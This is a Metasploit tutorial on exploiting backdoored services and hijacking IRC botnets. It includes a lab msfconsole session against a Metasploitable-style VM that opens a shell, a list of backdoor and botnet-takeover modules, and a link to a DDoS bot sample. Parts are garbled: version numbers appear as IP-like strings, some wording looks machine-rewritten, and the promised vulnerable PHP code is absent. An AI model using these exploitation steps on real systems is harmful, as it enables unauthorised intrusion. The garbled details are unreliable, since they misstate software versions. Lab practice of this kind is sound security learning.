In this article we will learn about Pwning Common Backdoors and Botnets.
Introduction [Pwning Common Backdoors and Botnets]:
Metasploit Framework has many exploit modules, including buffer overflow attacks, browser exploits, web application vulnerabilities, backdoor exploits, bot pwnage tools, etc. Exploit developers and contributors to the framework have shared a wide variety of interesting and very useful things.
In this article, we will talk about using Metasploit to hack and take over common backdoors and botnets. We will not cover all the modules but we will mention some modules which might be useful for your future work or penetration testing work. We won’t be doing exploit development, so there’s no need to find your debuggers and code editors.
If you’re new to Metasploit Framework, especially msfconsole (the framework’s command-line interface), don’t worry as this is a simple step-by-step guide on how to use the exploit module as well. One of the things required for this tutorial is that you have Metasploit installed on your attacker machine, so I would recommend having Kali Linux or maybe BackBox Linux, which are penetration testing distributions and have Metasploit preinstalled.
For our target machine, I also recommend installing Metasploitable 2 on your favorite virtualization platform such as VMWare or VirtualBox. Metasploitable 2 is a vulnerable Ubuntu Linux virtual machine that’s good for practicing your Metasploit-fu skills because it’s built to be insecure and your pet.
The Metasploitable 2 virtual machine is configured with known services that come with backdoors and services with known exploits in the wild.
On port 6667, Metasploitable 2 has the UnreaIRCD IRC daemon running, which actually has a backdoor triggered by sending the letters “AB”, allowing an attacker to execute any system commands with the privileges of the user running ircd. Now it’s good to exercise this vulnerability and see if we can pop the shell like it’s our lucky day. Fortunately, Metasploit has a module for this vulnerability under exploit/unix/irc/unreal_ircd_3281_backdoor.
Enter msfconsole to start the Metasploit command line interface. By typing info exploit/unix/irc/unreal_ircd_3281_backdoor we can see its description:
“This mod uses a malicious backdoor that was added to the Unreal IRCD 22.214.171.124 download archive. This backdoor was present in the Unreal126.96.36.199.tar.gz archive between November 2009 and June 12, 2010.”
Now is the time to take advantage of this sweet backdoor service!
W00t! We just got a shell. For more information on other vulnerable backdoor services, see the Metasploitable 2 Exploitability Guide.
However, Aurelius, I thought we were going to talk about common backdoors and pwnage botnets? Oh yes! We were just starting out and had a simple and concise tutorial on how to use the MSF console and how to backdoor the UnreaIRCD IRC server.
The goal was to introduce newbies that Metasploit also has these kinds of modules and not just about remote code execution on web applications and buffer overflows on applications and services.
In our next example, we’ll talk about using a web backdoor using an exploit module I wrote, which is the Simple Backdoor Shell Remote Code Execution module. This module exploits unauthenticated simple web backdoor shells by using a vulnerable parameter of a common backdoor shell to execute commands.
Daniel Miessler and Jason Haddix’s OWASP SecLists project has many samples for these kinds of backdoors, categorized under payload.
Before we get into the Simple Backdoor Shell Remote Code Execution module, we first need to create a backdoor shell on our target computer. I would recommend you to set up an Apache server on a Linux VM and use the following vulnerable code:
I placed this code on my Ubuntu VM at /var/www/html/msfdev/vulnerable.php so I should be able to browse it at http://localhost/msfdev/vulnerable.php just like the proof of concept image below of vulnerable code where you can execute arbitrary commands on the exec parameter.
As you can see in the console output using the show options command, we have some required options (besides RHOST, RPORT and the usual options) to set the HTP method using METHOD, the backdoor shell path via TARGETURI, and a command parameter or variable which is VAR.
Assuming our target computer has an IP address of 192.168.150.136, we need to set our RHOST with that IP address. For TARGETURI we need to define the path or location of our backdoor shell using /msfdev/vulnerable.php. And then for the VAR option we need to set exec as our variable because we can execute arbitrary commands on this parameter. We no longer need to set our HTTP method because the web application allows GET and that it is vulnerable using the GET method.
msf exploit(simple_backdoors_exec) > set rhost 192.168.150.136
rhost => 192.168.150.136
msf exploit(simple_backdoors_exec) > set var exec
var => exec
msf exploit(simple_backdoors_exec) > set TARGETURI /msfdev/vulnerable.php
TAGETURI => /msfdev/vulnerable.php
msf exploit(simple_backdoors_exec) > exploit
[*] Reverse double manipulator started
[*] First client connection accepted…
[*] Second client connection accepted…
[*] Command: echo wE5lyQtBEHIWwFd4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket A
[*] Answer: “wE5lyQtBEHIWwFd4rn”
[*] B is input…
[*] Shell session 1 opened (192.168.150.129:4444 -> 192.168.150.136:49484) at 2016-02-22 09:24:57 -0500
And we just fired our second shell! Ok, this is how you can use this module to exploit command webshells.
Here are other exploit modules you could use that are somehow related to this kind of module:
Th3 MMA mma.php Backdoor Arbitrary File Upload – This module uses the Th3 MMA mma.php Backdoor, which allows an arbitrary file to be uploaded that leads to the execution of arbitrary code. This backdoor also reflects the Linux kernel version or operating system version due to the php_uname() function.
Remote Code Execution of Zemra Botnet’s CnC Web Panel – This module uses Zemra Botnet’s CnC Web Panel, which contains a backdoor inside its leaked source code. Zemra is a criminal bot that can be used to perform DDoS attacks and is detected by Symantec as Backdoor.Zemra.
China Chopper Caidao PHP Backdoor Code Execution – This module uses China Chopper Webshell, which is commonly used by Chinese hackers.
Horde 3.3.12 Backdoor Arbitrary PHP Code Execution – This module exploits an arbitrary PHP code execution vulnerability introduced as a backdoor in Horde 3.3.12 and Horde Groupware 1.2.10.
OpenX Backdoor PHP Code Execution – OpenX Ad Server version 2.8.10 shipped with an obfuscated backdoor from at least November 2012 to August 2013. Exploitation is simple and requires only one request with rot13’d and a reversed payload.
STUNSHELL Web Shell remote PHP code execution – This module uses unverified versions of the “STUNSHELL” web shell. This module works when safe mode is enabled on the web server. This shell is widely used in automated RFI loads.
Plus the lists go on and on. There are many mods that you can still play with the search backdoor command.
Another type of modules I’ve written and contributed to are focused on botnet takeovers. One good example is the w3tw0rk / Pitbul IRC Bot Remote Execution Code. The module exploits the w3tw0rk botnet by masking or registering your nickname to its admin or shepherd on an IRC channel where the bot is idle or registered.
I want to give you a challenge so I don’t have to explain the options and how to exploit this kind of bot because there is already a screenshot for this vulnerability. I really think you can already see the pattern of setting up Metasploit with my previous instructions.
Here is the w3tw0rk / Pitbul IRC Bot source code or script that can be used for DDoS (Distributed Denial of Service) or DoS (Denial of Service) attacks: https://github.com/shipcod3/IRC-Bot-Hunters/ blob/ master/malicious_samples/w3tw0rk.txt. You need to run it on your virtual machine and make sure it connects to your own IRC server so your virtual machine doesn’t end up being captured by other bot herders and malware crusaders.
My inspiration for most of my bots is none other than the PHP IRC Bot pbot eval() Remote Code Execution module, which is the first IRC bot exploit in Metasploit. According to its description, “The module enables remote execution of commands on the PHP IRC bot pbot by abusing the use of eval() in the .php command implementation. In order for it to work, the data to connect to the IRC server and the channel to find the pbot must be provided. The module has been successfully tested on a pbot version analyzed by Jay Turla and published on the Infosec Institute, running on Ubuntu 10.04 and Windows XP SP3.
I am not responsible for any damage this script may cause, but please use it for educational purposes only.
Other exploit modules related to Botnet takeover:
Xdh Remote Code Execution / LinuxNet Perlbot / fBot Bot IRC – This module allows remote execution of commands on an IRC Bot developed by xdh. This pearl bot was caught by Conor Patrick with his shellshock honeypot server and is categorized as fBot (Fire & Forget – DDoS Bot) by Markus Zank. Matt Thayer also found this script which has a LinuxNet perlbot description. The bot only replies based on the server name and nickname in the IRC message, which is configured in the perl script, so you need to be an operator on the IRC network to spoof it and to use this bot or at least have the same IP to configure.
Ra1NX PHP Bot PubCall Authentication Remote Code Execution Bypass – This module allows remote execution of commands on the Ra1NX PHP IRC bot using the public call feature in a private message to secretly bypass the authentication system.
Legend Perl Bot IRC Remote Code Execution – This module uses remote command execution on the Legend Perl IRC Bot. This bot was used as a payload in the Shellshock spam last October 2014. This particular bot has features like NMAP scanning, TCP, HTTP, SQL and UDP flooding, the ability to remove system logs, and the ability to gain root and VNC capture. Kevin Stevens, Senior Threat Researcher at Damballa, uploaded this script to VirusTotal with md5 11a9f1589472efa719827079c3d13f76.
Dexter (CasinoLoader) SQL Injection – This module exploits a vulnerability found in the command and control panel used to control Dexter (Point of Sale malware). This is done by accessing the PHP page used by bots to report in (gateway.php) which does not sanitize the input. The input is encrypted and scrambled, but the key is supplied by the connecting bot. In this case, the ‘page’ parameter is used. The command and control panel specifies the location for uploading files and can be used as a reliable place to write the PHP shell. Authentication is not required to exploit this vulnerability.